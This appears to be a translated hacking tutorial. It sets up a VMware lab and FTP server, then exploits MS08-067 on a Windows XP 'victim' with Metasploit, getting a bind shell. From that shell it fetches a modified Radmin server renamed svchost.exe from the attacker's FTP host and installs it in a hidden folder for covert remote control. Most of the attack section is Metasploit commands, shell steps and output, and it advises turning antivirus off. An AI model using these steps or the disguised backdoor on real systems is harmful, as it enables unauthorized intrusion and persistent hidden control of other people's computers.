Software:

Any Windows XP (SP2,SP3).
Virtual Machine - Vmware.

Download and install a virtual machine Vmware.
Create a new machine in Vmware, click CTRL+N and follow the instructions,
then go to Edit => "Virtual Network Setting" and go to the tab "Host Virtual Adapter".


Click add and create the necessary number of virtual adapters. Then go to DHCP and delete from there all the adapters except, Wmnet1 and Wmnet8. Here you can click the Accept and OK, or go to the Host Virtual Network Mapping and configure each adapter to your ip, if you do not, they will be assigned automatically.


Go to the settings of virtual machine CTR + D, go to the tab "Enternet", select "Custop Specifnc: virtual network" and assign any interface you like, of course, except Wmnet1 and Wmnet8, I chose Vmnet2.


Now turn to the CD-ROM, put a tick in the Use ISO image, click the review and select the image from which you will install Windows, we can also install it from disk noting "Use physical drive", and selecting the appropriate drive.

Now run the virtual machine and click F12, if you have configured everything correctly, you get the setup screen.


Now we can do local network between the real and virtual PC.

Necessary software:
FTP - server (Serv-U)

So, after installation, you must configure the network, between our real and Virtual PC. To do this, go to the properties of a virtual connection adapter, which you selected tab Enternet, my it is a Vmnet2.



Now load the virtual machine and also go into network connections and look at the properties of tcp / ip.


Settings:

Now we put the FTP server on our real PC. Choose Serv-U, it is easy.
Creating a user should be without a password. Put FTP in 21 standard port, use the FTP protocol, too.


Sample:

Software:
Metasploit 3.2
Radmin Viewer 3
RadminServer (special)

Scan PC scanner X-Spider




We used to break into a vulnerability in the Server service (ms08_067). Run Metasploit 3 Web and when it is loaded in the browser write: 127.0.0.1:55555



use windows/smb/ms08_067_netapi; our exploit

set PAYLOAD generic/shell_bind_tcp ; choose stuffing

PAYLOAD => generic/shell_bind_tcp

set RHOST 192.168.1.10 ; host victim

RHOST => 192.168.1.10

set LPORT 7777 ; local port

LPORT => 7777

set RPORT 445 ; remote port
RPORT => 445



Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

C:\WINDOWS\system32>

Open a command prompt on the remote system.

(create a folder windows, folder helps)
cd c: \ windows
mkdir helps

(connect to our PC)
ftp192.168.1.3
User (192.168.1.3: (none)): kerny

(successful connection happens, go to c: \ kerny \ your FTP, there is radmin)
cd c: \ kerny \
dir

(files radmin)
drw-rw-rw-1 user group 0 Mar 2 20:10.
drw-rw-rw-1 user group 0 Mar 2 20:10 ..
-rw-rw-rw-1 user group 547 Mar 2 20:10 111.bat
-rw-rw-rw-1 user group 940 Mar 2 20:10 111.reg
-rw-rw-rw-1 user group 40448 Mar 2 20:10 AdmDll.dll
-rw-rw-rw-1 user group 17408 Mar 2 20:10 raddrv.dll
-rw-rw-rw-1 user group 152576 Mar 2 20:10 svchost.exe

(put the files on the victim's PC in the folder windows \ helps)
get 111.bat c: \ windows \ helps \ 111.bat
get 111.reg c: \ windows \ helps \ 111.reg
get AdmDll.dll c: \ windows \ helps \ AdmDll.dll
get raddrv.dll c: \ windows \ helps \ raddrv.dll
get svchost.exe c: \ windows \ helps \ svchost.exe
(Logoff from our FTP)
bye

(go to the folder, and check whether the downloaded files)
cd c: \ windows \ helps
dir
-rw-rw-rw-1 user group 547 Mar 2 20:11 111.bat
-rw-rw-rw-1 user group 940 Mar 2 20:11 111.reg
-rw-rw-rw-1 user group 40448 Mar 2 20:12 AdmDll.dll
-rw-rw-rw-1 user group 17408 Mar 2 20:12 raddrv.dll
-rw-rw-rw-1 user group 152576 Mar 2 20:12 svchost.exe

(set Radmin in the victim)
111.bat



Now run Radmin Viewer and connect.


Video + soft:

or 




or 


Important: Turn Antivirus off OR download on the virtual machine!!